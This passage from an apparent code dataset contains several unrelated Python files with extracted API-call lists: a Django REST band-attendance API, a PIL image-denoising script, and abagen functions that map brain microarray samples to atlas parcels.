"django.utils.timezone.now",
"django.urls.reverse",
"datetime.timedelta",
"django.test.Client"
] |
[((198, 206), 'django.test.Client', 'Client', ([], {}), '()\n', (204, 206), False, 'from django.test import TestCase, Client\n'), ((318, 332), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (330, 332), False, 'from django.utils import timezone\n'), ((335, 364), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': 'days'}), '(days=days)\n', (353, 364), False, 'import datetime\n'), ((3965, 4019), 'django.urls.reverse', 'reverse', (['"""pollsapp:detail"""'], {'args': '(future_question.id,)'}), "('pollsapp:detail', args=(future_question.id,))\n", (3972, 4019), False, 'from django.urls import reverse\n'), ((4290, 4339), 'django.urls.reverse', 'reverse', (['"""pollsapp:detail"""'], {'args': 'past_question.id'}), "('pollsapp:detail', args=past_question.id)\n", (4297, 4339), False, 'from django.urls import reverse\n'), ((641, 655), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (653, 655), False, 'from django.utils import timezone\n'), ((658, 685), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(30)'}), '(days=30)\n', (676, 685), False, 'import datetime\n'), ((967, 981), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (979, 981), False, 'from django.utils import timezone\n'), ((984, 1021), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)', 'seconds': '(1)'}), '(days=1, seconds=1)\n', (1002, 1021), False, 'import datetime\n'), ((1302, 1316), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (1314, 1316), False, 'from django.utils import timezone\n'), ((1319, 1371), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(23)', 'minutes': '(59)', 'seconds': '(59)'}), '(hours=23, minutes=59, seconds=59)\n', (1337, 1371), False, 'import datetime\n'), ((1712, 1737), 'django.urls.reverse', 'reverse', (['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (1719, 1737), False, 'from django.urls import reverse\n'), ((2149, 2174), 'django.urls.reverse', 'reverse', 
(['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (2156, 2174), False, 'from django.urls import reverse\n'), ((2543, 2568), 'django.urls.reverse', 'reverse', (['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (2550, 2568), False, 'from django.urls import reverse\n'), ((3019, 3044), 'django.urls.reverse', 'reverse', (['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (3026, 3044), False, 'from django.urls import reverse\n'), ((3469, 3494), 'django.urls.reverse', 'reverse', (['"""pollsapp:index"""'], {}), "('pollsapp:index')\n", (3476, 3494), False, 'from django.urls import reverse\n')]
|
import json
from django.forms import model_to_dict
from rest_framework import views
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from attendance.models import Attendance
from attendance.models import Event
from attendance.permissions import IsAttendanceAdmin
from attendance.permissions import IsAttendanceAdminOrReadOnly
from authentication.models import Account
from authentication.permissions import IsAccountAdminOrAccountOwner
from members.models import Band
from members.models import BandMember
from members.serializers import BandMemberSerializer
from members.serializers import BandSerializer
class BandViewSet(viewsets.ModelViewSet):
queryset = Band.objects.all()
serializer_class = BandSerializer
permission_classes = (IsAuthenticated, IsAttendanceAdminOrReadOnly,)
class BandAssignmentView(views.APIView):
permission_classes = (IsAuthenticated, IsAttendanceAdminOrReadOnly,)
def get(self, request, format=None):
band_assignments = {}
for band in Band.objects.all():
member_assignments = {}
member_assignments["assigned"] = []
member_assignments["unassigned"] = []
for assigned_member in band.assigned_members.all():
member_assignment = {
"id": assigned_member.id,
"name": assigned_member.full_name,
"section": assigned_member.section_display
}
member_assignments["assigned"].append(member_assignment)
for unassigned_member in band.unassigned_members.all():
member_assignment = {
"id": unassigned_member.id,
"name": unassigned_member.full_name,
"section": unassigned_member.section_display
}
member_assignments["unassigned"].append(member_assignment)
band_assignments[band.id] = member_assignments
return Response(band_assignments)
def post(self, request, format=None):
data = json.loads(request.body)
member_id = data.get('member', None)
band_id = data.get('band', None)
action = data.get('action', None)
if member_id and band_id and action:
band_member = BandMember.objects.get(id=member_id)
band = Band.objects.get(id=band_id)
if action == 'assign':
band.unassigned_members.remove(band_member)
band.assigned_members.add(band_member)
for event in band.events.all():
try:
attendance = Attendance.objects.get(event=event, member=band_member)
if attendance.points is None:
is_modified = False
if not attendance.assigned:
attendance.assigned = True
is_modified = True
if not attendance.is_active:
attendance.is_active = True
is_modified = True
if is_modified:
attendance.save()
except Attendance.DoesNotExist:
Attendance.objects.create(event=event, member=band_member, assigned=True)
elif action == 'unassign':
band.unassigned_members.add(band_member)
band.assigned_members.remove(band_member)
for event in band.events.all():
try:
attendance = Attendance.objects.get(
event=event,
member=band_member,
points__isnull=True,
assigned=True)
attendance.assigned = False
attendance.is_active = False
attendance.save()
except Attendance.DoesNotExist:
pass
band.save()
return Response()
else:
return Response({
'status': 'Bad request',
'message': 'Missing parameter in request',
}, status=status.HTTP_400_BAD_REQUEST)
class BandMemberViewSet(viewsets.ModelViewSet):
queryset = BandMember.objects.all()
serializer_class = BandMemberSerializer
permission_classes = (IsAuthenticated, IsAccountAdminOrAccountOwner,)
class UnassignedMembersView(views.APIView):
permission_classes = (IsAuthenticated, IsAttendanceAdmin,)
def get(self, request, format=None):
event_id = self.request.query_params.get('event_id', None)
if event_id:
try:
event = Event.objects.get(id=event_id)
except Event.DoesNotExist:
return Response({
'status': 'Bad request',
'message': 'Could not find event from event_id',
}, status=status.HTTP_400_BAD_REQUEST)
existing_unassigned_members = Attendance.objects.filter(
event=event,
assigned=False,
is_active=True,
).values_list('member_id', flat=True).distinct()
band = event.band
if band:
unassigned_members_queryset = band.unassigned_members
else:
unassigned_members_queryset = BandMember.objects.filter(account__is_active=True)
unassigned_members = unassigned_members_queryset.exclude(
id__in=existing_unassigned_members).all()
unassigned_members_dicts = []
for unassigned_member in unassigned_members:
full_name = unassigned_member.full_name
member_dict = model_to_dict(unassigned_member)
member_dict['full_name'] = full_name
unassigned_members_dicts.append(member_dict)
return Response(unassigned_members_dicts)
return Response({
'status': 'Bad request',
'message': 'No event_id in request',
}, status=status.HTTP_400_BAD_REQUEST)
|
[
"json.loads",
"members.models.Band.objects.get",
"attendance.models.Attendance.objects.filter",
"members.models.BandMember.objects.get",
"attendance.models.Attendance.objects.create",
"rest_framework.response.Response",
"members.models.Band.objects.all",
"attendance.models.Event.objects.get",
"members.models.BandMember.objects.all",
"django.forms.model_to_dict",
"attendance.models.Attendance.objects.get",
"members.models.BandMember.objects.filter"
] |
[((754, 772), 'members.models.Band.objects.all', 'Band.objects.all', ([], {}), '()\n', (770, 772), False, 'from members.models import Band\n'), ((4454, 4478), 'members.models.BandMember.objects.all', 'BandMember.objects.all', ([], {}), '()\n', (4476, 4478), False, 'from members.models import BandMember\n'), ((1092, 1110), 'members.models.Band.objects.all', 'Band.objects.all', ([], {}), '()\n', (1108, 1110), False, 'from members.models import Band\n'), ((2049, 2075), 'rest_framework.response.Response', 'Response', (['band_assignments'], {}), '(band_assignments)\n', (2057, 2075), False, 'from rest_framework.response import Response\n'), ((2135, 2159), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (2145, 2159), False, 'import json\n'), ((6142, 6254), 'rest_framework.response.Response', 'Response', (["{'status': 'Bad request', 'message': 'No event_id in request'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'status': 'Bad request', 'message': 'No event_id in request'},\n status=status.HTTP_400_BAD_REQUEST)\n", (6150, 6254), False, 'from rest_framework.response import Response\n'), ((2359, 2395), 'members.models.BandMember.objects.get', 'BandMember.objects.get', ([], {'id': 'member_id'}), '(id=member_id)\n', (2381, 2395), False, 'from members.models import BandMember\n'), ((2415, 2443), 'members.models.Band.objects.get', 'Band.objects.get', ([], {'id': 'band_id'}), '(id=band_id)\n', (2431, 2443), False, 'from members.models import Band\n'), ((4183, 4193), 'rest_framework.response.Response', 'Response', ([], {}), '()\n', (4191, 4193), False, 'from rest_framework.response import Response\n'), ((4227, 4345), 'rest_framework.response.Response', 'Response', (["{'status': 'Bad request', 'message': 'Missing parameter in request'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'status': 'Bad request', 'message':\n 'Missing parameter in request'}, status=status.HTTP_400_BAD_REQUEST)\n", (4235, 4345), False, 'from rest_framework.response import 
Response\n'), ((6091, 6125), 'rest_framework.response.Response', 'Response', (['unassigned_members_dicts'], {}), '(unassigned_members_dicts)\n', (6099, 6125), False, 'from rest_framework.response import Response\n'), ((4877, 4907), 'attendance.models.Event.objects.get', 'Event.objects.get', ([], {'id': 'event_id'}), '(id=event_id)\n', (4894, 4907), False, 'from attendance.models import Event\n'), ((5559, 5609), 'members.models.BandMember.objects.filter', 'BandMember.objects.filter', ([], {'account__is_active': '(True)'}), '(account__is_active=True)\n', (5584, 5609), False, 'from members.models import BandMember\n'), ((5924, 5956), 'django.forms.model_to_dict', 'model_to_dict', (['unassigned_member'], {}), '(unassigned_member)\n', (5937, 5956), False, 'from django.forms import model_to_dict\n'), ((4970, 5094), 'rest_framework.response.Response', 'Response', (["{'status': 'Bad request', 'message': 'Could not find event from event_id'}"], {'status': 'status.HTTP_400_BAD_REQUEST'}), "({'status': 'Bad request', 'message':\n 'Could not find event from event_id'}, status=status.HTTP_400_BAD_REQUEST)\n", (4978, 5094), False, 'from rest_framework.response import Response\n'), ((2704, 2759), 'attendance.models.Attendance.objects.get', 'Attendance.objects.get', ([], {'event': 'event', 'member': 'band_member'}), '(event=event, member=band_member)\n', (2726, 2759), False, 'from attendance.models import Attendance\n'), ((3368, 3441), 'attendance.models.Attendance.objects.create', 'Attendance.objects.create', ([], {'event': 'event', 'member': 'band_member', 'assigned': '(True)'}), '(event=event, member=band_member, assigned=True)\n', (3393, 3441), False, 'from attendance.models import Attendance\n'), ((3706, 3801), 'attendance.models.Attendance.objects.get', 'Attendance.objects.get', ([], {'event': 'event', 'member': 'band_member', 'points__isnull': '(True)', 'assigned': '(True)'}), '(event=event, member=band_member, points__isnull=True,\n assigned=True)\n', (3728, 3801), False, 
'from attendance.models import Attendance\n'), ((5193, 5263), 'attendance.models.Attendance.objects.filter', 'Attendance.objects.filter', ([], {'event': 'event', 'assigned': '(False)', 'is_active': '(True)'}), '(event=event, assigned=False, is_active=True)\n', (5218, 5263), False, 'from attendance.models import Attendance\n')]
|
#-*- coding: utf-8 -*-
import os
from PIL import Image, ImageDraw, ImageEnhance
def denoise(img):
im = Image.open(img)
enhancer = ImageEnhance.Contrast(im)
im = enhancer.enhance(3)
im = im.convert('1')
data = im.getdata()
w, h = im.size
for x in range(1, w-1):
l = []
y = 1
while(y < h-1):
m = y
count = 0
while(m < h-1 and im.getpixel((x, m)) == 0):
count = count + 1
m = m + 1
if(count <= 2 and count > 0):
c = count
while c > 0:
l.append(m - c)
c = c - 1
y = y + count + 1
if len(l) != 0:
i = 1
while i < len(l):
data.putpixel((x, l[i]), 255)
i = i + 1
for y in range(1, h-1):
l = []
x = 1
while(x < w-1):
m = x
count = 0
while(m < w-1 and im.getpixel((m, y)) == 0):
count = count + 1
m = m + 1
if(count <= 2 and count > 0):
c = count
while c > 0:
l.append(m - c)
c = c - 1
x = x + count + 1
if len(l) != 0:
i = 1
while i < len(l):
data.putpixel((l[i], y), 255)
i = i + 1
return im
def NaiveRemoveNoise(im, pnum = 5):
w, h = im.size;
white = 255;
black = 0;
for i in range(0, w):
im.putpixel((i, 0), white);
im.putpixel((i, h - 1), white);
for i in range(0, h):
im.putpixel((0, i), white);
im.putpixel((w - 1, i), white);
for i in range(1, w - 1):
for j in range(1, h - 1):
val = im.getpixel((i, j));
# 黑色的情况
if val == black:
cnt = 0;
for ii in range(-1, 2):
for jj in range(-1, 2):
if im.getpixel((i + ii, j + jj)) == black:
cnt += 1;
if cnt < pnum:
im.putpixel((i, j), white);
else:
cnt = 0;
for ii in range(-1, 2):
for jj in range(-1, 2):
if im.getpixel((i + ii, j + jj)) == black:
cnt += 1;
if cnt >= 7:
im.putpixel((i, j), black);
if __name__ == '__main__':
img = 'test/0004.jpg'
new = denoise(img)
new.save('clean1.jpg')
NaiveRemoveNoise(new)
new.save('clean2.jpg')
|
[
"PIL.ImageEnhance.Contrast",
"PIL.Image.open"
] |
[((113, 128), 'PIL.Image.open', 'Image.open', (['img'], {}), '(img)\n', (123, 128), False, 'from PIL import Image, ImageDraw, ImageEnhance\n'), ((145, 170), 'PIL.ImageEnhance.Contrast', 'ImageEnhance.Contrast', (['im'], {}), '(im)\n', (166, 170), False, 'from PIL import Image, ImageDraw, ImageEnhance\n')]
|
# -*- coding: utf-8 -*-
"""
Functions for mapping AHBA microarray dataset to atlases and and parcellations
in MNI space
"""
from functools import reduce
from nilearn._utils import check_niimg_3d
import numpy as np
import pandas as pd
from scipy.spatial.distance import cdist
from abagen import datasets, io, process, utils
def _assign_sample(sample, atlas, sample_info=None, atlas_info=None,
tolerance=2):
"""
Determines which parcel `sample` belongs to in `atlas`
Parameters
----------
sample : (1, 3) array_like
Coordinates (ijk) of microarray sample in `atlas` space
atlas : niimg-like object
ROI image, where each ROI should be identified with a unique
integer ID
sample_info : pandas.DataFrame
A single row of an `annotation` file, corresponding to the given sample
atlas_info : pandas.DataFrame,
Dataframe containing information about the specified `atlas`. Must have
_at least_ columns 'id', 'hemisphere', and 'structure' containing
information mapping atlas IDs to hemisphere and broad structural class
(i.e., "cortex", "subcortex", "cerebellum"). Default: None
tolerance : int, optional
Distance (in mm) that a sample must be from a parcel for it to be
matched to that parcel. This is only considered if the sample is not
directly within a parcel. Default: 2
Returns
-------
label : int
Parcel label of `sample`
"""
# pull relevant info from atlas
label_data = check_niimg_3d(atlas).get_data()
# expand provided coordinates to include those w/i `tolerance` of `coords`
# set a hard euclidean distance limit to account for different voxel sizes
coords = utils.expand_roi(sample, dilation=tolerance, return_array=True)
coords = coords[cdist(sample, coords).squeeze() < tolerance]
# grab non-zero labels for expanded coordinates
possible_labels = label_data[coords[:, 0], coords[:, 1], coords[:, 2]]
nz_labels = possible_labels[possible_labels.nonzero()]
labels, counts = np.unique(nz_labels, return_counts=True)
# if atlas_info and sample_info are provided, drop potential labels who
# don't match hemisphere or structural class defined in `sample_info`
if atlas_info is not None and sample_info is not None:
for old_label in labels:
new_label = _check_label(old_label, sample_info, atlas_info)
if old_label != new_label:
nz_labels[nz_labels == old_label] = new_label
labels, counts = np.unique(nz_labels[nz_labels.nonzero()],
return_counts=True)
# if there is still nothing in the vicinity, return 0
if labels.size == 0:
return 0
# if there is only one ROI in the vicinity, use that
elif labels.size == 1:
return labels[0]
# if more than one ROI in the vicinity, return the most frequent
indmax, = np.where(counts == counts.max())
if indmax.size == 1:
return labels[indmax[0]]
# if two or more parcels tied for neighboring frequency, use ROI
# with closest centroid to `coords`
centroids = utils.get_centroids(atlas, labels)
return labels[utils.closest_centroid(sample, centroids)]
def _check_label(label, sample_info, atlas_info):
"""
Checks that `label` defined by `sample_info` is coherent with `atlas_info`
Parameters
----------
label : int
Tenative label for sample described by `sample_info`
sample_info : pandas.DataFrame
A single row of an `annotation` file, corresponding to the given sample
atlas_info : pandas.DataFrame,
Dataframe containing information about the atlas of interest. Must have
_at least_ columns 'id', 'hemisphere', and 'structure' containing
information mapping atlas IDs to hemisphere and broad structural class
(i.e., "cortex", "subcortex", "cerebellum"). Default: None
Returns
-------
label : int
New label for sample
"""
cols = ['hemisphere', 'structure']
if label != 0:
sample_info = sample_info[cols]
atlas_info = atlas_info.loc[label][cols]
if not np.all(sample_info.values == atlas_info.values):
label = 0
return label
def label_samples(annotation, atlas, atlas_info=None, tolerance=2):
    """
    Matches all microarray samples in `annotation` to parcels in `atlas`

    Each sample is first assigned the label of the voxel its MNI coordinates
    fall in. Samples that land outside every parcel get a second chance: the
    search radius around them is grown one unit at a time, up to `tolerance`,
    and the nearest parcel (if any) is used instead. Samples that still cannot
    be matched receive a label of 0.

    Parameters
    ----------
    annotation : (S, 13) pandas.DataFrame
        Pre-loaded annotation information for a given AHBA donor
    atlas : niimg-like object
        A parcellation image in MNI space, where each parcel is identified by
        a unique integer ID
    atlas_info : pandas.DataFrame, optional
        Filepath to or pre-loaded dataframe containing information about
        `atlas`. Must have _at least_ columns 'id', 'hemisphere', and
        'structure' mapping atlas IDs to hemisphere and broad structural
        class. Default: None
    tolerance : int, optional
        Distance (in mm) that a sample may be from a parcel and still be
        matched to it; only consulted when the sample is not directly inside
        a parcel. Default: 2

    Returns
    -------
    labels : (S, 1) pandas.DataFrame
        Dataframe with parcel labels for each of `S` samples
    """
    annotation = io.read_annotation(annotation)
    atlas = check_niimg_3d(atlas)
    label_data, affine = atlas.get_data(), atlas.affine

    if atlas_info is not None:
        atlas_info = utils.check_atlas_info(atlas, atlas_info)

    # convert sample MNI (xyz) coordinates into voxel (ijk) space and read
    # the parcel label at each sample's voxel
    g_ijk = utils.xyz_to_ijk(annotation[['mni_x', 'mni_y', 'mni_z']], affine)
    labelled = label_data[g_ijk[:, 0], g_ijk[:, 1], g_ijk[:, 2]]

    # retry every unassigned sample with a progressively larger search
    # radius; samples that stay unmatched keep the label 0
    for idx in np.where(labelled == 0)[0]:
        assigned, radius = labelled[idx], 1
        while assigned == 0 and radius <= tolerance:
            assigned = _assign_sample(g_ijk[[idx]], atlas,
                                      sample_info=annotation.iloc[idx],
                                      atlas_info=atlas_info,
                                      tolerance=radius)
            radius += 1
        labelled[idx] = assigned

    return pd.DataFrame(labelled, dtype=int,
                        columns=['label'], index=annotation.index)
def group_by_label(microarray, sample_labels, labels=None, metric='mean'):
    """
    Collapses expression data in `microarray` over samples with same label

    Parameters
    ----------
    microarray : (S, G) pandas.DataFrame
        Microarray expression data, where `S` is samples and `G` is genes
    sample_labels : (S, 1) pandas.DataFrame
        Parcel labels for `S` samples, as returned by e.g., `label_samples()`
    labels : (L,) array_like, optional
        All possible labels for the parcellation, so that parcels which
        received NO expression data still appear (as all-NaN rows) in the
        output. Default: None
    metric : str or func, optional
        Mechanism by which to collapse across samples within a parcel. If a
        str, should be in ['mean', 'median']; if a function, should accept an
        `N`-dimensional input and the `axis` keyword argument and return an
        `N-1`-dimensional output. Default: 'mean'

    Returns
    -------
    gene_by_label : (L, G) pandas.DataFrame
        Microarray expression data collapsed by parcel label
    """
    agg_func = utils.check_metric(metric)

    # build placeholder (all-NaN) rows for parcels that received no samples
    fill = labels
    if labels is not None:
        unassigned = np.setdiff1d(labels, sample_labels)
        fill = pd.DataFrame(columns=microarray.columns,
                            index=pd.Series(unassigned, name='label'))

    # tag each sample with its parcel label, collapse within parcels, pad
    # with empty parcels, and drop label 0 ("unassigned")
    tagged = microarray.merge(sample_labels,
                              left_index=True, right_index=True)
    collapsed = (tagged.groupby('label')
                       .aggregate(agg_func)
                       .append(fill)
                       .drop([0])
                       .sort_index()
                       .rename_axis('label'))
    return collapsed
def get_expression_data(atlas, atlas_info=None, *, exact=True,
                        tolerance=2, metric='mean', ibf_threshold=0.5,
                        corrected_mni=True, reannotated=True,
                        return_counts=False, return_donors=False,
                        donors='all', data_dir=None):
    """
    Assigns microarray expression data to ROIs defined in `atlas`

    This function aims to provide a workflow for generating pre-processed,
    microarray expression data for arbitrary `atlas` designations. First, some
    basic filtering of genetic probes is performed, including:

        1. Intensity-based filtering of microarray probes to remove probes
           that do not exceed a certain level of background noise (specified
           via the `ibf_threshold` parameter), and
        2. Selection of a single, representative probe for each gene via a
           differential stability metric, wherein the probe that has the most
           consistent regional variation across donors is retained.

    Tissue samples are then matched to parcels in the defined `atlas` for each
    donor. If `atlas_info` is provided then this matching is constrained by
    both hemisphere and tissue class designation (e.g., cortical samples from
    the left hemisphere are only matched to ROIs in the left cortex,
    subcortical samples from the right hemisphere are only matched to ROIs in
    the left subcortex); see the `atlas_info` parameter description for more
    information.

    Matching of microarray samples to parcels in `atlas` is done via a multi-
    step process:

        1. Determine if the sample falls directly within a parcel,
        2. Check to see if there are nearby parcels by slowly expanding the
           search space to include nearby voxels, up to a specified distance
           (specified via the `tolerance` parameter),
        3. If there are multiple nearby parcels, the sample is assigned to the
           closest parcel, as determined by the parcel centroid.

    If at any step a sample can be assigned to a parcel the matching process
    is terminated. If multiple sample are assigned to the same parcel they are
    aggregated with the metric specified via the `metric` parameter. More
    control over the sample matching can be obtained by setting the `exact`
    parameter; see the parameter description for more information.

    Once all samples have been matched to parcels for all supplied donors, the
    microarray expression data are normalized within-donor via a scaled robust
    sigmoid (SRS) procedure before being combined across donors via the
    supplied `metric`.

    Parameters
    ----------
    atlas : niimg-like object
        A parcellation image in MNI space, where each parcel is identified by
        a unique integer ID
    atlas_info : str or :class:`pandas.DataFrame`, optional
        Filepath to or pre-loaded dataframe containing information about
        `atlas`. Must have at least columns 'id', 'hemisphere', and
        'structure' containing information mapping atlas IDs to hemisphere
        (i.e, "L", "R") and broad structural class (i.e., "cortex",
        "subcortex", "cerebellum"). Default: None
    exact : bool, optional
        Whether to use exact matching of donor tissue samples to parcels in
        `atlas`. If True, this function will match tissue samples to parcels
        within `threshold` mm of the sample; any samples that are beyond
        `threshold` mm of a parcel will be discarded. This may result in some
        parcels having no assigned sample / expression data. If False, the
        default matching procedure will be performed and followed by a check
        for parcels with no assigned samples; any such parcels will be matched
        to the nearest sample (nearest defined as the sample with the closest
        Euclidean distance to the parcel centroid). Default: True
    tolerance : int, optional
        Distance (in mm) that a sample must be from a parcel for it to be
        matched to that parcel. This is only considered if the sample is not
        directly within a parcel. Default: 2
    metric : str or func, optional
        Mechanism by which to collapse across donors, if input `files`
        provides multiple donor datasets. If a str, should be in ['mean',
        'median']; if a function, should be able to accept an `N`-dimensional
        input and the `axis` keyword argument and return an `N-1`-dimensional
        output. Default: 'mean'
    ibf_threshold : [0, 1] float, optional
        Threshold for intensity-based filtering specifying. This number should
        specify the ratio of samples, across all supplied donors, for which a
        probe must have signal above background noise in order to be retained.
        Default: 0.5
    corrected_mni : bool, optional
        Whether to use the "corrected" MNI coordinates shipped with the
        `alleninf` package instead of the coordinates provided with the AHBA
        data when matching tissue samples to anatomical regions. Default: True
    reannotated : bool, optional
        Whether to use reannotated probe information provided by [1]_ instead
        of the default probe information from the AHBA dataset. Using
        reannotated information will discard probes that could not be reliably
        matched to genes. Default: True
    return_counts : bool, optional
        Whether to return how many samples were assigned to each parcel in
        `atlas` for each donor. Default: False
    return_donors : bool, optional
        Whether to return donor-level expression arrays instead of aggregating
        expression across donors with provided `metric`. Default: False
    donors : list, optional
        List of donors to use as sources of expression data. Can be either
        donor numbers or UID. If not specified will use all available donors.
        Default: 'all'
    data_dir : str, optional
        Directory where expression data should be downloaded (if it does not
        already exist) / loaded. If not specified will use the current
        directory. Default: None

    Returns
    -------
    expression : (R, G) :class:`pandas.DataFrame`
        Microarray expression for `R` regions in `atlas` for `G` genes,
        aggregated across donors, where the index corresponds to the unique
        integer IDs of `atlas` and the columns are gene names.
    counts : (R, D) :class:`pandas.DataFrame`
        Number of samples assigned to each of `R` regions in `atlas` for each
        of `D` donors (if multiple donors were specified); only returned if
        `return_counts=True`.

    References
    ----------
    .. [1] <NAME>., <NAME>., & <NAME>. (2019). A
       practical guide to linking brain-wide gene expression and neuroimaging
       data. NeuroImage, 189, 353-367.
    .. [2] <NAME>. et al. (2012) An anatomically comprehensive atlas of
       the adult human transcriptome. Nature, 489, 391-399.
    """
    # fetch files (downloads on first use; cached in `data_dir` thereafter)
    files = datasets.fetch_microarray(data_dir=data_dir, donors=donors)
    for key in ['microarray', 'probes', 'annotation', 'pacall', 'ontology']:
        if key not in files:
            raise KeyError('Provided `files` dictionary is missing {}. '
                           'Please check inputs.'.format(key))

    # load atlas_info, if provided
    atlas = check_niimg_3d(atlas)
    if atlas_info is not None:
        atlas_info = utils.check_atlas_info(atlas, atlas_info)

    # get combination functions
    metric = utils.check_metric(metric)

    # get some info on the number of subjects, labels in `atlas_img`
    num_subj = len(files.microarray)
    all_labels = utils.get_unique_labels(atlas)
    # parcel centroids are only needed for the "fill empty parcels" fallback
    if not exact:
        centroids = utils.get_centroids(atlas, labels=all_labels)

    # reannotate probes based on updates from Arnatkeviciute et al., 2018 then
    # perform intensity-based filter of probes and select probe with highest
    # differential stability for each gene amongst remaining probes
    if reannotated:
        probes = process.reannotate_probes(files.probes[0])
    else:
        probes = io.read_probes(files.probes[0])
    probes = process.filter_probes(files.pacall, probes,
                                   threshold=ibf_threshold)
    probes = process.get_stable_probes(files.microarray, files.annotation,
                                       probes)

    # per-donor expression frames and, when `exact` is False, per-donor
    # (closest-sample, {label: distance}) caches for empty parcels
    expression, missing = [], []
    # counts has one extra leading row for label 0 ("unassigned")
    counts = pd.DataFrame(np.zeros((len(all_labels) + 1, num_subj)),
                          index=np.append([0], all_labels))

    for subj in range(num_subj):
        # get rid of samples whose coordinates don't match ontological profile
        annotation = process.drop_mismatch_samples(files.annotation[subj],
                                                   files.ontology[subj],
                                                   corrected=corrected_mni)

        # subset representative probes + samples from microarray data
        microarray = io.read_microarray(files.microarray[subj])
        samples = microarray.loc[probes.index, annotation.index].T
        samples.columns = probes.gene_symbol

        # assign samples to regions and aggregate samples w/i the same region
        sample_labels = label_samples(annotation, atlas,
                                      atlas_info=atlas_info,
                                      tolerance=tolerance)
        expression += [group_by_label(samples, sample_labels,
                                      all_labels, metric=metric)]

        # get counts of samples collapsed into each ROI
        labs, num = np.unique(sample_labels, return_counts=True)
        counts.loc[labs, subj] = num

        # if we don't want to do exact matching then cache which parcels are
        # missing data and the expression data for the closest sample to that
        # parcel; we'll use this once we've iterated through all donors
        if not exact:
            coords = utils.xyz_to_ijk(annotation[['mni_x', 'mni_y', 'mni_z']],
                                      atlas.affine)
            empty = ~np.in1d(all_labels, labs)
            closest, dist = utils.closest_centroid(coords, centroids[empty],
                                                   return_dist=True)
            closest = samples.loc[annotation.iloc[closest].index]
            empty = all_labels[empty]
            closest.index = pd.Series(empty, name='label')
            missing += [(closest, dict(zip(empty, np.diag(dist))))]

    # check for missing ROIs and fill in, as needed
    if not exact:
        # find labels that are missing across all donors
        empty = reduce(set.intersection, [set(f.index) for f, d in missing])
        for roi in empty:
            # find donor with sample closest to centroid of empty parcel
            ind = np.argmin([d.get(roi) for f, d in missing])
            # assign expression data from that sample and add to count
            expression[ind].loc[roi] = missing[ind][0].loc[roi]
            counts.loc[roi, ind] += 1

    # normalize data with SRS and aggregate across donors
    expression = [process.normalize_expression(e) for e in expression]
    if not return_donors:
        expression = process.aggregate_donors(expression, metric)

    if return_counts:
        # drop the label-0 row: those samples were never assigned to a parcel
        return expression, counts.iloc[1:]

    return expression
|
[
"abagen.utils.check_metric",
"abagen.utils.xyz_to_ijk",
"abagen.io.read_probes",
"abagen.process.drop_mismatch_samples",
"numpy.diag",
"numpy.unique",
"pandas.DataFrame",
"abagen.utils.closest_centroid",
"abagen.process.get_stable_probes",
"abagen.process.normalize_expression",
"nilearn._utils.check_niimg_3d",
"abagen.process.filter_probes",
"numpy.append",
"scipy.spatial.distance.cdist",
"abagen.utils.check_atlas_info",
"abagen.io.read_microarray",
"abagen.utils.get_unique_labels",
"abagen.utils.expand_roi",
"pandas.Series",
"abagen.io.read_annotation",
"numpy.all",
"abagen.process.aggregate_donors",
"abagen.utils.get_centroids",
"abagen.datasets.fetch_microarray",
"numpy.setdiff1d",
"numpy.where",
"abagen.process.reannotate_probes",
"numpy.in1d"
] |
[((1758, 1821), 'abagen.utils.expand_roi', 'utils.expand_roi', (['sample'], {'dilation': 'tolerance', 'return_array': '(True)'}), '(sample, dilation=tolerance, return_array=True)\n', (1774, 1821), False, 'from abagen import datasets, io, process, utils\n'), ((2095, 2135), 'numpy.unique', 'np.unique', (['nz_labels'], {'return_counts': '(True)'}), '(nz_labels, return_counts=True)\n', (2104, 2135), True, 'import numpy as np\n'), ((3186, 3220), 'abagen.utils.get_centroids', 'utils.get_centroids', (['atlas', 'labels'], {}), '(atlas, labels)\n', (3205, 3220), False, 'from abagen import datasets, io, process, utils\n'), ((6448, 6478), 'abagen.io.read_annotation', 'io.read_annotation', (['annotation'], {}), '(annotation)\n', (6466, 6478), False, 'from abagen import datasets, io, process, utils\n'), ((6491, 6512), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], {}), '(atlas)\n', (6505, 6512), False, 'from nilearn._utils import check_niimg_3d\n'), ((6777, 6842), 'abagen.utils.xyz_to_ijk', 'utils.xyz_to_ijk', (["annotation[['mni_x', 'mni_y', 'mni_z']]", 'affine'], {}), "(annotation[['mni_x', 'mni_y', 'mni_z']], affine)\n", (6793, 6842), False, 'from abagen import datasets, io, process, utils\n'), ((7563, 7652), 'pandas.DataFrame', 'pd.DataFrame', (['labelled_samples'], {'dtype': 'int', 'columns': "['label']", 'index': 'annotation.index'}), "(labelled_samples, dtype=int, columns=['label'], index=\n annotation.index)\n", (7575, 7652), True, 'import pandas as pd\n'), ((8760, 8786), 'abagen.utils.check_metric', 'utils.check_metric', (['metric'], {}), '(metric)\n', (8778, 8786), False, 'from abagen import datasets, io, process, utils\n'), ((16518, 16577), 'abagen.datasets.fetch_microarray', 'datasets.fetch_microarray', ([], {'data_dir': 'data_dir', 'donors': 'donors'}), '(data_dir=data_dir, donors=donors)\n', (16543, 16577), False, 'from abagen import datasets, io, process, utils\n'), ((16868, 16889), 'nilearn._utils.check_niimg_3d', 'check_niimg_3d', (['atlas'], 
